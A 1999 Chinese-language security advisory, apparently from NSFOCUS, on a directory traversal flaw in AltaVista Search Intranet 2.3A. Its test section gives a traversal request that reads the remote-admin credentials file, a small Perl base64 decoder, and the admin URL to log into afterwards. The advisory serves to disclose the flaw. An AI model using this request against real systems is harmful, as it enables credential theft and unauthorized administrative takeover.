首页 -> 安全研究

安全研究

安全漏洞
AltaVista 搜索引擎目录遍历问题

发布日期:1999-12-30
更新日期:1999-12-30

受影响系统:
AltaVista Search Intranet 2.3A
描述:
AltaVista Search engine在9000端口开启了一个webserver,用来监听搜索请求.主要的搜索
函数(cgi-bin/query)中有一个模板变量{mss},它将接受搜索请求中的包含的单个"../"字符
串,提供对上一层目录('http')中所有文档的访问权限.
这些文档可能包含很多管理信息,包括用来进行远程管理的用户名和口令.这些用户名和口令
被base-64编码,可以很容易得被恢复成纯文本方式,因此攻击者可以获得远程管理这个搜索引
擎的权力.


< 发现者: rudi carell (rudicarell@HOTMAIL.COM) >



测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!


通过执行  http://target:9000/cgi-bin/query?../logs/mgtstate
可以获得mgtstate文件的内容,这里面包含有远程管理的用户名和口令.

利用下面的小程序就可以将其解码,得到用户名和口令:

#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";

然后执行  http://target:9000/cgi-bin/mgt
输入得到的用户名和口令就可以远程管理该搜索引擎

建议:
暂无

浏览次数:6882
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障